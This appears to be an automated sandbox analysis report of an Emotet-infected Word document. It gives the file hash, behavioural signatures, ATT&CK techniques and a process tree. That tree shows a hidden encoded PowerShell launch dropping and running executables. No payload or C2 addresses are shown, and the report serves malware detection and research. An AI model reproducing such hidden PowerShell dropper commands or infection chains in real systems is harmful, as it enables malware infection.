Analysis

  • max time kernel
    137s
  • resource
    win7v191014
  • submitted
    11-12-2019 05:53

General

  • Target

    Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc

  • Sample

    191211-xf6bzaykg2

  • SHA256

    4ee0bf78e3b0a06c35fed0f912db6fabbb5fae13f838cd4132634359ad0d24da

Malware Config

Extracted

Language: ps1
Source URLs: exe.dropper

Extracted

Family: emotet

C2

rsa_pubkey.plain

Signatures

  • Modifies registry class 136 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Modifies system certificate store 2 TTPs 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_6ad036ba93c94d6976e2d93c7a3aec6f.html.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:1336
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en 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
    1⤵
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:2008
    • C:\Users\Admin\216.exe
      "C:\Users\Admin\216.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1368
      • C:\Users\Admin\216.exe
        --7272c7d5
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:1872
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-1548836680-533666437-679457699-1403319995-15752893778627448631697681750379809567"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2032
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:1252
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:828
      • C:\Windows\SysWOW64\boostleel.exe
        "C:\Windows\SysWOW64\boostleel.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:2040
        • C:\Windows\SysWOW64\boostleel.exe
          --26b15e59
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          • Suspicious behavior: EnumeratesProcesses
          PID:2020

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion
    • Install Root Certificate: 1 (T1130)
    • Modify Registry: 1 (T1112)
  • Discovery
    • Query Registry: 1 (T1012)


Downloads

  • C:\Users\Admin\216.exe
  • C:\Users\Admin\216.exe
  • C:\Users\Admin\216.exe
  • C:\Windows\SysWOW64\boostleel.exe
  • C:\Windows\SysWOW64\boostleel.exe
  • memory/1336-4-0x00000000060C1000-0x00000000060C5000-memory.dmp (Filesize: 16KB)
  • memory/1336-6-0x00000000060C1000-0x00000000060C5000-memory.dmp (Filesize: 16KB)
  • memory/1336-5-0x00000000060C1000-0x00000000060C5000-memory.dmp (Filesize: 16KB)
  • memory/1336-0-0x0000000005EA0000-0x0000000005EA4000-memory.dmp (Filesize: 16KB)
  • memory/1336-3-0x0000000008EE0000-0x0000000008EE4000-memory.dmp (Filesize: 16KB)
  • memory/1336-2-0x00000000060C1000-0x00000000060C5000-memory.dmp (Filesize: 16KB)
  • memory/1336-1-0x0000000006117000-0x000000000611A000-memory.dmp (Filesize: 12KB)
  • memory/1368-9-0x0000000000290000-0x00000000002A7000-memory.dmp (Filesize: 92KB)
  • memory/1872-11-0x0000000001BE0000-0x0000000001BF7000-memory.dmp (Filesize: 92KB)
  • memory/1872-12-0x0000000000400000-0x0000000000492000-memory.dmp (Filesize: 584KB)
  • memory/2020-16-0x0000000000910000-0x0000000000927000-memory.dmp (Filesize: 92KB)
  • memory/2020-17-0x0000000000400000-0x0000000000492000-memory.dmp (Filesize: 584KB)
  • memory/2040-14-0x0000000000630000-0x0000000000647000-memory.dmp (Filesize: 92KB)